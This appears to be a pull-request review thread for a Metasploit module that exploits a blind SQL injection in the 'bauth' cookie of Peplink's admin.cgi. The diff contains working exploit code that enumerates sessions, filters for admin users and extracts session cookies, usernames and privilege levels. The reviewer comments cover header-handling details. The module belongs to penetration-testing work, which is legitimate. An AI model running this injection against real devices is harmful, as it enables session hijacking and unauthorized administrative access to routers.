modules/auxiliary/sqli/peplink_bauth_sqli.rb

```diff
@@ -0,0 +1,111 @@
+        OptBool.new('AdminOnly', [true, 'Only attempt to retrieve cookies of privilegied users (admins)', false])
+      ]
+    )
+  end
+
+  def perform_sqli
+    # Note: using run_sql because there is a limit on the length of our queries
+    # will work only if we remove the casts, NULL value handling etc.
+    digit_range = ('0'..'9')
+    bit_range = ('0'..'1')
+    alphanumeric_range = ('0'..'z')
+    session_count = @sqli.run_sql("select count(1) from sessionsvariables where name='expire'").to_i
+    print_status "There are #{session_count} (possibly expired) sessions"
+
+    # limit the number of session cookies to retrieve if the option is set
+    session_count = datastore['LimitTries'] if datastore['LimitTries'] && datastore['LimitTries'] < session_count
+
+    session_ids = session_count.times.map do |i|
+      id = @sqli.run_sql('select id from sessionsvariables ' \
+                    "where name='expire' order by " \
+                    "cast(value as int) desc limit 1 offset #{i}", output_charset: digit_range).to_i
+      # if AdminOnly, check if is an admin
+      if datastore['AdminOnly']
+        is_rwa = @sqli.run_sql("select count(1)>0 from sessionsvariables where id=#{id} and name='rwa' and value='1'", output_charset: bit_range).to_i
+        is_rwa > 0 ? id : nil
+      else
+        id
+      end
+    end.compact
+
+    print_status("After filtering out non-admin sessions: #{session_ids.count} sessions remain") if datastore['AdminOnly']
+
+    if session_ids.count == 0
+      print_error('No active authenticated sessions found, try again after a user has authenticated')
+      return
+    end
+
+    print_status('Trying the ids from the most recent login')
+
+    session_ids.each_with_index do |id, idx|
+      cookie = @sqli.run_sql("select sessionid from sessions where id=#{id}", output_charset: alphanumeric_range)
+      if datastore['EnumUsernames']
+        username = @sqli.run_sql("select value from sessionsvariables where name='username' and id=#{id}")
+      end
+
+      if datastore['EnumPrivs']
+        is_rwa = @sqli.run_sql("select count(1)>0 from sessionsvariables where id=#{id} and name='rwa' and value='1'", output_charset: bit_range).to_i
+      end
+      username_msg = username ? ", username = #{username}" : ''
+      is_admin_msg = is_rwa ? ", with #{is_rwa > 0 ? 'read/write' : 'read-only'} permissions" : ''
+      print_good "Found cookie #{cookie}#{username_msg}#{is_admin_msg}"
+      break if session_count == idx + 1
+    end
+  end
+
+  def run
+    @sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind) do |payload|
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'MANGA', 'admin.cgi'),
+        'method' => 'GET',
+        'cookie' => "bauth=' or #{payload}--"
+      })
+      fail_with 'Unable to connect to target' unless res
+      !res.headers['Set-Cookie'] # no Set-Cookie header means the session cookie is valid
```

Comment:
```suggestion
      res.get_cookies.empty? # no Set-Cookie header means the session cookie is valid
```

Looking at the source for get_cookies, I suspect this will work and seems reasonable to address the `msftidy` failure. https://github.com/rapid7/metasploit-framework/blob/1bd4a8d7525ef801e769e3c4edc0eab754be1aec/lib/rex/proto/http/response.rb#L69-L86)

Reply:
There is a small issue with using `get_cookies`, I noticed the server responds with a `Set-cookie` header, with a lowercase `c`, and the `Hash#include?` method checks for keys in a case-sensitive manner, tested it and it fails to retrieve the cookie.

as a result, an empty string is always returned.

![Set-cookie header](https://i.imgur.com/VKNpkCh.png)


I read the code, `Packet::Header#[]` works in a case-insensitive manner, perhaps we should override `Packet::Header#include?` also ?

Reply:
Per the [RFC 7230](https://tools.ietf.org/html/rfc7230#section-3.2) and [RFC 7540](https://tools.ietf.org/html/rfc7540#section-8.1.2) header names are case-insensitive.  I believe you are correct that `include?` should be overridden in `lib/rex/proto/http/packet/header.rb`.

Reply:
Nice find. Yes, `include?` should be overridden. This algorithm using `casecmp` to check keys in the datastore hash has proven efficient and should work for `include?` once modified to return `true` or `false`: https://github.com/rapid7/metasploit-framework/blob/1bd4a8d7525ef801e769e3c4edc0eab754be1aec/lib/msf/core/data_store.rb#L321-L325

Reply:
I sent a quick PR to fix it, #13900 , used the `any?` method because I find it a bit more readable, but should have the same performance at least (stop at the first encounter), will change it if you prefer consistent coding style.